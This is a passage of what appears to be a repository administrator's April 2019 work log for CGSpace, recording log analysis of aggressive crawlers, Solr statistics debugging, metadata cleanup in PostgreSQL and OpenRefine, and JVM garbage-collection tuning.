+<li>The other thing visible there is that the past few days the load has spiked to 500% and I don&rsquo;t think it&rsquo;s a coincidence that the Solr updating thing is happening&hellip;</li>
+<li>I ran all system updates and rebooted the server
+<ul>
+<li>The load was lower on the server after reboot, but Solr didn&rsquo;t come back up properly according to the Solr Admin UI:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>statistics-2017: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher 
+</code></pre><ul>
+<li>I restarted it again and all the Solr cores came up properly&hellip;</li>
+</ul>
+<h2 id="2019-04-06">2019-04-06</h2>
+<ul>
+<li>Udana asked why item <a href="https://cgspace.cgiar.org/handle/10568/91278">10568/91278</a> didn&rsquo;t have an Altmetric badge on CGSpace, but on the <a href="https://wle.cgiar.org/food-and-agricultural-innovation-pathways-prosperity">WLE website</a> it does
+<ul>
+<li>I looked and saw that the WLE website is using the Altmetric score associated with the DOI, and that the Handle has no score at all</li>
+<li>I tweeted the item and I assume this will link the Handle with the DOI in the system</li>
+<li>Twenty minutes later I see the same Altmetric score (9) on CGSpace</li>
+</ul>
+</li>
+<li>Linode sent an alert that there was high CPU usage this morning on CGSpace (linode18) and these were the top IPs in the webserver access logs around the time:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;06/Apr/2019:(06|07|08|09)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    222 18.195.78.144
+    245 207.46.13.58
+    303 207.46.13.194
+    328 66.249.79.33
+    564 207.46.13.210
+    566 66.249.79.62
+    575 40.77.167.66
+   1803 66.249.79.59
+   2834 2a01:4f8:140:3192::2
+   9623 45.5.184.72
+# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &#34;06/Apr/2019:(06|07|08|09)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     31 66.249.79.62
+     41 207.46.13.210
+     42 40.77.167.66
+     54 42.113.50.219
+    132 66.249.79.59
+    785 2001:41d0:d:1990::
+   1164 45.5.184.72
+   2014 50.116.102.77
+   4267 45.5.186.2
+   4893 205.186.128.185
+</code></pre><ul>
+<li><code>45.5.184.72</code> is in Colombia so it&rsquo;s probably CIAT, and I see they are indeed trying to get crawl the Discover pages on CIAT&rsquo;s datasets collection:</li>
+</ul>
+<pre tabindex="0"><code>GET /handle/10568/72970/discover?filtertype_0=type&amp;filtertype_1=author&amp;filter_relational_operator_1=contains&amp;filter_relational_operator_0=equals&amp;filter_1=&amp;filter_0=Dataset&amp;filtertype=dateIssued&amp;filter_relational_operator=equals&amp;filter=2014
+</code></pre><ul>
+<li>Their user agent is the one I added to the badbots list in nginx last week: &ldquo;GuzzleHttp/6.3.3 curl/7.47.0 PHP/7.0.30-0ubuntu0.16.04.1&rdquo;</li>
+<li>They made 22,000 requests to Discover on this collection today alone (and it&rsquo;s only 11AM):</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;06/Apr/2019&#34; | grep 45.5.184.72 | grep -oE &#39;/handle/[0-9]+/[0-9]+/discover&#39; | sort | uniq -c 
+  22077 /handle/10568/72970/discover
+</code></pre><ul>
+<li>Yesterday they made 43,000 requests and we actually blocked most of them:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#34;05/Apr/2019&#34; | grep 45.5.184.72 | grep -oE &#39;/handle/[0-9]+/[0-9]+/discover&#39; | sort | uniq -c 
+  43631 /handle/10568/72970/discover
+# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#34;05/Apr/2019&#34; | grep 45.5.184.72 | grep -E &#39;/handle/[0-9]+/[0-9]+/discover&#39; | awk &#39;{print $9}&#39; | sort | uniq -c 
+    142 200
+  43489 503
+</code></pre><ul>
+<li>I need to find a contact at CIAT to tell them to use the REST API rather than crawling Discover</li>
+<li>Maria from Bioversity recommended that we use the phrase &ldquo;AGROVOC subject&rdquo; instead of &ldquo;Subject&rdquo; in Listings and Reports
+<ul>
+<li>I made a pull request to update this and merged it to the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/418">#418</a>)</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-04-07">2019-04-07</h2>
+<ul>
+<li>Looking into the impact of harvesters like <code>45.5.184.72</code>, I see in Solr that this user is not categorized as a bot so it definitely impacts the usage stats by some tens of thousands <em>per day</em></li>
+<li>Last week CTA switched their frontend code to use HEAD requests instead of GET requests for bitstreams
+<ul>
+<li>I am trying to see if these are registered as downloads in Solr or not</li>
+<li>I see 96,925 downloads from their AWS gateway IPs in 2019-03:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&amp;fq=statistics_type%3Aview&amp;fq=bundleName%3AORIGINAL&amp;fq=dateYearMonth%3A2019-03&amp;rows=0&amp;wt=json&amp;indent=true&#39;
+{
+    &#34;response&#34;: {
+        &#34;docs&#34;: [],
+        &#34;numFound&#34;: 96925,
+        &#34;start&#34;: 0
+    },
+    &#34;responseHeader&#34;: {
+        &#34;QTime&#34;: 1,
+        &#34;params&#34;: {
+            &#34;fq&#34;: [
+                &#34;statistics_type:view&#34;,
+                &#34;bundleName:ORIGINAL&#34;,
+                &#34;dateYearMonth:2019-03&#34;
+            ],
+            &#34;indent&#34;: &#34;true&#34;,
+            &#34;q&#34;: &#34;type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)&#34;,
+            &#34;rows&#34;: &#34;0&#34;,
+            &#34;wt&#34;: &#34;json&#34;
+        },
+        &#34;status&#34;: 0
+    }
+}
+</code></pre><ul>
+<li>Strangely I don&rsquo;t see many hits in 2019-04:</li>
+</ul>
+<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&amp;fq=statistics_type%3Aview&amp;fq=bundleName%3AORIGINAL&amp;fq=dateYearMonth%3A2019-04&amp;rows=0&amp;wt=json&amp;indent=true&#39;
+{
+    &#34;response&#34;: {
+        &#34;docs&#34;: [],
+        &#34;numFound&#34;: 38,
+        &#34;start&#34;: 0
+    },
+    &#34;responseHeader&#34;: {
+        &#34;QTime&#34;: 1,
+        &#34;params&#34;: {
+            &#34;fq&#34;: [
+                &#34;statistics_type:view&#34;,
+                &#34;bundleName:ORIGINAL&#34;,
+                &#34;dateYearMonth:2019-04&#34;
+            ],
+            &#34;indent&#34;: &#34;true&#34;,
+            &#34;q&#34;: &#34;type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)&#34;,
+            &#34;rows&#34;: &#34;0&#34;,
+            &#34;wt&#34;: &#34;json&#34;
+        },
+        &#34;status&#34;: 0
+    }
+}
+</code></pre><ul>
+<li>Making some tests on GET vs HEAD requests on the <a href="https://dspacetest.cgiar.org/handle/10568/100289">CTA Spore 192 item</a> on DSpace Test:</li>
+</ul>
+<pre tabindex="0"><code>$ http --print Hh GET https://dspacetest.cgiar.org/bitstream/handle/10568/100289/Spore-192-EN-web.pdf
+GET /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Host: dspacetest.cgiar.org
+User-Agent: HTTPie/1.0.2
+
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Language: en-US
+Content-Length: 2069158
+Content-Type: application/pdf;charset=ISO-8859-1
+Date: Sun, 07 Apr 2019 08:38:34 GMT
+Expires: Sun, 07 Apr 2019 09:38:34 GMT
+Last-Modified: Thu, 14 Mar 2019 11:20:05 GMT
+Server: nginx
+Set-Cookie: JSESSIONID=21A492CC31CA8845278DFA078BD2D9ED; Path=/; Secure; HttpOnly
+Vary: User-Agent
+X-Cocoon-Version: 2.2.0
+X-Content-Type-Options: nosniff
+X-Frame-Options: SAMEORIGIN
+X-Robots-Tag: none
+X-XSS-Protection: 1; mode=block
+
+$ http --print Hh HEAD https://dspacetest.cgiar.org/bitstream/handle/10568/100289/Spore-192-EN-web.pdf      
+HEAD /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1                                                            
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Host: dspacetest.cgiar.org
+User-Agent: HTTPie/1.0.2
+
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Language: en-US
+Content-Length: 2069158
+Content-Type: application/pdf;charset=ISO-8859-1
+Date: Sun, 07 Apr 2019 08:39:01 GMT
+Expires: Sun, 07 Apr 2019 09:39:01 GMT
+Last-Modified: Thu, 14 Mar 2019 11:20:05 GMT
+Server: nginx
+Set-Cookie: JSESSIONID=36C8502257CC6C72FD3BC9EBF91C4A0E; Path=/; Secure; HttpOnly                                            
+Vary: User-Agent
+X-Cocoon-Version: 2.2.0
+X-Content-Type-Options: nosniff
+X-Frame-Options: SAMEORIGIN
+X-Robots-Tag: none
+X-XSS-Protection: 1; mode=block
+</code></pre><ul>
+<li>And from the server side, the nginx logs show:</li>
+</ul>
+<pre tabindex="0"><code>78.x.x.x - - [07/Apr/2019:01:38:35 -0700] &#34;GET /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1&#34; 200 68078 &#34;-&#34; &#34;HTTPie/1.0.2&#34;
+78.x.x.x - - [07/Apr/2019:01:39:01 -0700] &#34;HEAD /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1&#34; 200 0 &#34;-&#34; &#34;HTTPie/1.0.2&#34;
+</code></pre><ul>
+<li>So definitely the <em>size</em> of the transfer is more efficient with a HEAD, but I need to wait to see if these requests show up in Solr
+<ul>
+<li>After twenty minutes of waiting I still don&rsquo;t see any new requests in the statistics core, but when I try the requests from the command line again I see the following in the DSpace log:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>2019-04-07 02:05:30,966 INFO  org.dspace.usage.LoggerUsageEventListener @ anonymous:session_id=EF2DB6E4F69926C5555B3492BB0071A8:ip_addr=78.x.x.x:view_bitstream:bitstream_id=165818
+2019-04-07 02:05:39,265 INFO  org.dspace.usage.LoggerUsageEventListener @ anonymous:session_id=B6381FC590A5160D84930102D068C7A3:ip_addr=78.x.x.x:view_bitstream:bitstream_id=165818
+</code></pre><ul>
+<li>So my inclination is that both HEAD and GET requests are registered as views as far as Solr and DSpace are concerned
+<ul>
+<li>Strangely, the statistics Solr core says it hasn&rsquo;t been modified in 24 hours, so I tried to start the &ldquo;optimize&rdquo; process from the Admin UI and I see this in the Solr log:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>2019-04-07 02:08:44,186 INFO  org.apache.solr.update.UpdateHandler @ start commit{,optimize=true,openSearcher=true,waitSearcher=true,expungeDeletes=false,softCommit=false,prepareCommit=false}
+</code></pre><ul>
+<li>Ugh, even after optimizing there are no Solr results for requests from my IP, and actually I only see 18 results from 2019-04 so far and none of them are <code>statistics_type:view</code>&hellip; very weird
+<ul>
+<li>I don&rsquo;t even see many hits for days after 2019-03-17, when I migrated the server to Ubuntu 18.04 and copied the statistics core from CGSpace (linode18)</li>
+<li>I will try to re-deploy the <code>5_x-dev</code> branch and test again</li>
+</ul>
+</li>
+<li>According to the <a href="https://wiki.lyrasis.org/display/DSDOC5x/SOLR+Statistics">DSpace 5.x Solr documentation</a> the default commit time is after 15 minutes or 10,000 documents (see <code>solrconfig.xml</code>)</li>
+<li>I looped some GET and HEAD requests to a bitstream on my local instance and after some time I see that they <em>do</em> register as downloads (even though they are internal):</li>
+</ul>
+<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8080/solr/statistics/select?q=type%3A0+AND+time%3A2019-04-07*&amp;fq=statistics_type%3Aview&amp;fq=isInternal%3Atrue&amp;rows=0&amp;wt=json&amp;indent=true&#39;
+{
+    &#34;response&#34;: {
+        &#34;docs&#34;: [],
+        &#34;numFound&#34;: 909,
+        &#34;start&#34;: 0
+    },
+    &#34;responseHeader&#34;: {
+        &#34;QTime&#34;: 0,
+        &#34;params&#34;: {
+            &#34;fq&#34;: [
+                &#34;statistics_type:view&#34;,
+                &#34;isInternal:true&#34;
+            ],
+            &#34;indent&#34;: &#34;true&#34;,
+            &#34;q&#34;: &#34;type:0 AND time:2019-04-07*&#34;,
+            &#34;rows&#34;: &#34;0&#34;,
+            &#34;wt&#34;: &#34;json&#34;
+        },
+        &#34;status&#34;: 0
+    }
+}
+</code></pre><ul>
+<li>I confirmed the same on CGSpace itself after making one HEAD request</li>
+<li>So I&rsquo;m pretty sure it&rsquo;s something about DSpace Test using the CGSpace statistics core, and not that I deployed Solr 4.10.4 there last week
+<ul>
+<li>I deployed Solr 4.10.4 locally and ran a bunch of requests for bitstreams and they do show up in the Solr statistics log, so the issue must be with re-using the existing Solr core from CGSpace</li>
+</ul>
+</li>
+<li>Now this gets more frustrating: I did the same GET and HEAD tests on a local Ubuntu 16.04 VM with Solr 4.10.2 and 4.10.4 and the statistics are recorded
+<ul>
+<li>This leads me to believe there is something specifically wrong with DSpace Test (linode19)</li>
+<li>The only thing I can think of is that the JVM is using G1GC instead of ConcMarkSweepGC</li>
+</ul>
+</li>
+<li>Holy shit, all this is actually because of the GeoIP1 deprecation and a missing <code>GeoLiteCity.dat</code>
+<ul>
+<li>For some reason the missing GeoIP data causes stats to not be recorded whatsoever and there is no error!</li>
+<li>See: <a href="https://jira.duraspace.org/browse/DS-3986">DS-3986</a></li>
+<li>See: <a href="https://jira.duraspace.org/browse/DS-4020">DS-4020</a></li>
+<li>See: <a href="https://jira.duraspace.org/browse/DS-3832">DS-3832</a></li>
+<li>DSpace 5.10 upgraded to use GeoIP2, but we are on 5.8 so I just copied the missing database file from another server because it has been <em>removed</em> from MaxMind&rsquo;s server as of 2018-04-01</li>
+<li>Now I made 100 requests and I see them in the Solr statistics&hellip; fuck my life for wasting five hours debugging this</li>
+</ul>
+</li>
+<li>UptimeRobot said CGSpace went down and up a few times tonight, and my first instict was to check <code>iostat 1 10</code> and I saw that CPU steal is around 10–30 percent right now&hellip;</li>
+<li>The load average is super high right now, as I&rsquo;ve noticed the last few times UptimeRobot said that CGSpace went down:</li>
+</ul>
+<pre tabindex="0"><code>$ cat /proc/loadavg 
+10.70 9.17 8.85 18/633 4198
+</code></pre><ul>
+<li>According to the server logs there is actually not much going on right now:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &#34;07/Apr/2019:(18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    118 18.195.78.144
+    128 207.46.13.219
+    129 167.114.64.100
+    159 207.46.13.129
+    179 207.46.13.33
+    188 2408:8214:7a00:868f:7c1e:e0f3:20c6:c142
+    195 66.249.79.59
+    363 40.77.167.21
+    740 2a01:4f8:140:3192::2
+   4823 45.5.184.72
+# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &#34;07/Apr/2019:(18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+      3 66.249.79.62
+      3 66.249.83.196
+      4 207.46.13.86
+      5 82.145.222.150
+      6 2a01:4f9:2b:1263::2
+      6 41.204.190.40
+      7 35.174.176.49
+     10 40.77.167.21
+     11 194.246.119.6
+     11 66.249.79.59
+</code></pre><ul>
+<li><code>45.5.184.72</code> is CIAT, who I already blocked and am waiting to hear from</li>
+<li><code>2a01:4f8:140:3192::2</code> is BLEXbot, which should be handled by the Tomcat Crawler Session Manager Valve</li>
+<li><code>2408:8214:7a00:868f:7c1e:e0f3:20c6:c142</code> is some stupid Chinese bot making malicious POST requests</li>
+<li>There are free database connections in the pool:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
+      5 dspaceApi
+      7 dspaceCli
+     23 dspaceWeb
+</code></pre><ul>
+<li>It seems that the issue with CGSpace being &ldquo;down&rdquo; is actually because of CPU steal again!!!</li>
+<li>I opened a ticket with support and asked them to migrate the VM to a less busy host</li>
+</ul>
+<h2 id="2019-04-08">2019-04-08</h2>
+<ul>
+<li>Start checking IITA&rsquo;s last round of batch uploads from <a href="https://dspacetest.cgiar.org/handle/10568/100333">March on DSpace Test</a> (20193rd.xls)
+<ul>
+<li>Lots of problems with affiliations, I had to correct about sixty of them</li>
+<li>I used lein to host the latest CSV of our affiliations for OpenRefine to reconcile against:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ lein run ~/src/git/DSpace/2019-02-22-affiliations.csv name id
+</code></pre><ul>
+<li>After matching the values and creating some new matches I had trouble remembering how to copy the reconciled values to a new column
+<ul>
+<li>The matched values can be accessed with <code>cell.recon.match.name</code>, but some of the new values don&rsquo;t appear, perhaps because I edited the original cell values?</li>
+<li>I ended up using this GREL expression to copy all values to a new column:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>if(cell.recon.matched, cell.recon.match.name, value)
+</code></pre><ul>
+<li>See the <a href="https://github.com/OpenRefine/OpenRefine/wiki/Variables#recon">OpenRefine variables documentation</a> for more notes about the <code>recon</code> object</li>
+<li>I also noticed a handful of errors in our current list of affiliations so I corrected them:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-04-08-fix-13-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211 -t correct -d
+</code></pre><ul>
+<li>We should create a new list of affiliations to update our controlled vocabulary again</li>
+<li>I dumped a list of the top 1500 affiliations:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 211 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-04-08-top-1500-affiliations.csv WITH CSV HEADER;
+COPY 1500
+</code></pre><ul>
+<li>Fix a few more messed up affiliations that have return characters in them (use Ctrl-V Ctrl-M to re-create control character):</li>
+</ul>
+<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=&#39;International Institute for Environment and Development&#39; WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE &#39;International Institute^M%&#39;;
+dspace=# UPDATE metadatavalue SET text_value=&#39;Kenya Agriculture and Livestock Research Organization&#39; WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE &#39;Kenya Agricultural  and Livestock  Research^M%&#39;;
+</code></pre><ul>
+<li>I noticed a bunch of subjects and affiliations that use stylized apostrophes so I will export those and then batch update them:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE &#39;%’%&#39;) to /tmp/2019-04-08-affiliations-apostrophes.csv WITH CSV HEADER;
+COPY 60
+dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 57 AND text_value LIKE &#39;%’%&#39;) to /tmp/2019-04-08-subject-apostrophes.csv WITH CSV HEADER;
+COPY 20
+</code></pre><ul>
+<li>I cleaned them up in OpenRefine and then applied the fixes on CGSpace and DSpace Test:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-60-affiliations-apostrophes.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211 -t correct -d
+$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-20-subject-apostrophes.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.subject -m 57 -t correct -d
+</code></pre><ul>
+<li>UptimeRobot said that CGSpace (linode18) went down tonight
+<ul>
+<li>The load average is at <code>9.42, 8.87, 7.87</code></li>
+<li>I looked at PostgreSQL and see shitloads of connections there:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
+      5 dspaceApi
+      7 dspaceCli
+    250 dspaceWeb
+</code></pre><ul>
+<li>On a related note I see connection pool errors in the DSpace log:</li>
+</ul>
+<pre tabindex="0"><code>2019-04-08 19:01:10,472 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error - 
+org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-319] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:250; idle:0; lastwait:5000].
+</code></pre><ul>
+<li>But still I see 10 to 30% CPU steal in <code>iostat</code> that is also reflected in the Munin graphs:</li>
+</ul>
+<p><img src="/cgspace-notes/2019/04/cpu-week2.png" alt="CPU usage week"></p>
+<ul>
+<li>Linode Support still didn&rsquo;t respond to my ticket from yesterday, so I attached a new output of <code>iostat 1 10</code> and asked them to move the VM to a less busy host</li>
+<li>The web server logs are not very busy:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &#34;08/Apr/2019:(17|18|19)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    124 40.77.167.135
+    135 95.108.181.88
+    139 157.55.39.206
+    190 66.249.79.133
+    202 45.5.186.2
+    284 207.46.13.95
+    359 18.196.196.108
+    457 157.55.39.164
+    457 40.77.167.132
+   3822 45.5.184.72
+# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &#34;08/Apr/2019:(17|18|19)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+      5 129.0.79.206
+      5 41.205.240.21
+      7 207.46.13.95
+      7 66.249.79.133
+      7 66.249.79.135
+      7 95.108.181.88
+      8 40.77.167.111
+     19 157.55.39.164
+     20 40.77.167.132
+    370 51.254.16.223
+</code></pre><h2 id="2019-04-09">2019-04-09</h2>
+<ul>
+<li>Linode sent an alert that CGSpace (linode18) was 440% CPU for the last two hours this morning</li>
+<li>Here are the top IPs in the web server logs around that time:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &#34;09/Apr/2019:(06|07|08)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     18 66.249.79.139
+     21 157.55.39.160
+     29 66.249.79.137
+     38 66.249.79.135
+     50 34.200.212.137
+     54 66.249.79.133
+    100 102.128.190.18
+   1166 45.5.184.72
+   4251 45.5.186.2
+   4895 205.186.128.185
+# zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &#34;09/Apr/2019:(06|07|08)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    200 144.48.242.108
+    202 207.46.13.185
+    206 18.194.46.84
+    239 66.249.79.139
+    246 18.196.196.108
+    274 31.6.77.23
+    289 66.249.79.137
+    312 157.55.39.160
+    441 66.249.79.135
+    856 66.249.79.133
+</code></pre><ul>
+<li><code>45.5.186.2</code> is at CIAT in Colombia and I see they are mostly making requests to the REST API, but also to XMLUI with the following user agent:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
+</code></pre><ul>
+<li>Database connection usage looks fine:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
+      5 dspaceApi
+      7 dspaceCli
+     11 dspaceWeb
+</code></pre><ul>
+<li>Ironically I do still see some 2 to 10% of CPU steal in <code>iostat 1 10</code></li>
+<li>Leroy from CIAT contacted me to say he knows the team who is making all those requests to CGSpace
+<ul>
+<li>I told them how to use the REST API to get the CIAT Datasets collection and enumerate its items</li>
+</ul>
+</li>
+<li>In other news, Linode staff identified a noisy neighbor sharing our host and migrated it elsewhere last night</li>
+</ul>
+<h2 id="2019-04-10">2019-04-10</h2>
+<ul>
+<li>Abenet pointed out a possibility of validating funders against the <a href="https://support.crossref.org/hc/en-us/articles/215788143-Funder-data-via-the-API">CrossRef API</a></li>
+<li>Note that if you use HTTPS and specify a contact address in the API request you have less likelihood of being blocked</li>
+</ul>
+<pre tabindex="0"><code>$ http &#39;https://api.crossref.org/funders?query=mercator&amp;mailto=me@cgiar.org&#39;
+</code></pre><ul>
+<li>Otherwise, they provide the funder data in <a href="https://www.crossref.org/services/funder-registry/">CSV and RDF format</a></li>
+<li>I did a quick test with the recent IITA records against reconcile-csv in OpenRefine and it matched a few, but the ones that didn&rsquo;t match will need a human to go and do some manual checking and informed decision making&hellip;</li>
+<li>If I want to write a script for this I could use the Python <a href="https://habanero.readthedocs.io/en/latest/modules/crossref.html">habanero library</a>:</li>
+</ul>
+<pre tabindex="0"><code>from habanero import Crossref
+cr = Crossref(mailto=&#34;me@cgiar.org&#34;)
+x = cr.funders(query = &#34;mercator&#34;)
+</code></pre><h2 id="2019-04-11">2019-04-11</h2>
+<ul>
+<li>Continue proofing IITA&rsquo;s last round of batch uploads from <a href="https://dspacetest.cgiar.org/handle/10568/100333">March on DSpace Test</a> (20193rd.xls)
+<ul>
+<li>One misspelled country</li>
+<li>Three incorrect regions</li>
+<li>Potential duplicates (same DOI, similar title, same authors):
+<ul>
+<li><a href="https://dspacetest.cgiar.org/handle/10568/100580">10568/100580</a> and <a href="https://dspacetest.cgiar.org/handle/10568/100579">10568/100579</a></li>
+<li><a href="https://dspacetest.cgiar.org/handle/10568/100444">10568/100444</a> and <a href="https://dspacetest.cgiar.org/handle/10568/100423">10568/100423</a></li>
+</ul>
+</li>
+<li>Two DOIs with incorrect URL formatting</li>
+<li>Two misspelled IITA subjects</li>
+<li>Two authors with smart quotes</li>
+<li>Lots of issues with sponsors</li>
+<li>One misspelled &ldquo;Peer review&rdquo;</li>
+<li>One invalid ISBN that I fixed by Googling the title</li>
+<li>Lots of issues with sponsors (German Aid Agency, Swiss Aid Agency, Italian Aid Agency, Dutch Aid Agency, etc)</li>
+<li>I validated all the AGROVOC subjects against our latest list with reconcile-csv
+<ul>
+<li>About 720 of the 900 terms were matched, then I checked and fixed or deleted the rest manually</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>I captured a few general corrections and deletions for AGROVOC subjects while looking at IITA&rsquo;s records, so I applied them to DSpace Test and CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-04-11-fix-14-subjects.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.subject -m 57 -t correct -d
+$ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 57 -f dc.subject -d
+</code></pre><ul>
+<li>Answer more questions about DOIs and Altmetric scores from WLE</li>
+<li>Answer more questions about DOIs and Altmetric scores from IWMI
+<ul>
+<li>They can&rsquo;t seem to understand the Altmetric + Twitter flow for associating Handles and DOIs</li>
+<li>To make things worse, many of their items DON&rsquo;T have DOIs, so when Altmetric harvests them of course there is no link!  - Then, a bunch of their items don&rsquo;t have scores because they never tweeted them!</li>
+<li>They added a DOI to this old item <a href="https://cgspace.cgiar.org/handle/10568/97087">10567/97087</a> this morning and wonder why Altmetric&rsquo;s score hasn&rsquo;t linked with the DOI magically</li>
+<li>We should check in a week to see if Altmetric will make the association after one week when they harvest again</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-04-13">2019-04-13</h2>
+<ul>
+<li>I copied the <code>statistics</code> and <code>statistics-2018</code> Solr cores from CGSpace to my local machine and watched the Java process in VisualVM while indexing item views and downloads with my <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a>:</li>
+</ul>
+<p><img src="/cgspace-notes/2019/04/visualvm-solr-indexing.png" alt="Java GC during Solr indexing with CMS"></p>
+<ul>
+<li>It took about eight minutes to index 784 pages of item views and 268 of downloads, and you can see a clear &ldquo;sawtooth&rdquo; pattern in the garbage collection</li>
+<li>I am curious if the GC pattern would be different if I switched from the <code>-XX:+UseConcMarkSweepGC</code> to G1GC</li>
+<li>I switched to G1GC and restarted Tomcat but for some reason I couldn&rsquo;t see the Tomcat PID in VisualVM&hellip;
+<ul>
+<li>Anyways, the indexing process took much longer, perhaps twice as long!</li>
+</ul>
+</li>
+<li>I tried again with the GC tuning settings from the Solr 4.10.4 release:</li>
+</ul>
+<p><img src="/cgspace-notes/2019/04/visualvm-solr-indexing-solr-settings.png" alt="Java GC during Solr indexing Solr 4.10.4 settings"></p>
+<h2 id="2019-04-14">2019-04-14</h2>
+<ul>
+<li>Change DSpace Test (linode19) to use the Java GC tuning from the Solr 4.10.4 startup script:</li>
+</ul>
+<pre tabindex="0"><code>GC_TUNE=&#34;-XX:NewRatio=3 \
+    -XX:SurvivorRatio=4 \
+    -XX:TargetSurvivorRatio=90 \
+    -XX:MaxTenuringThreshold=8 \
+    -XX:+UseConcMarkSweepGC \
+    -XX:+UseParNewGC \
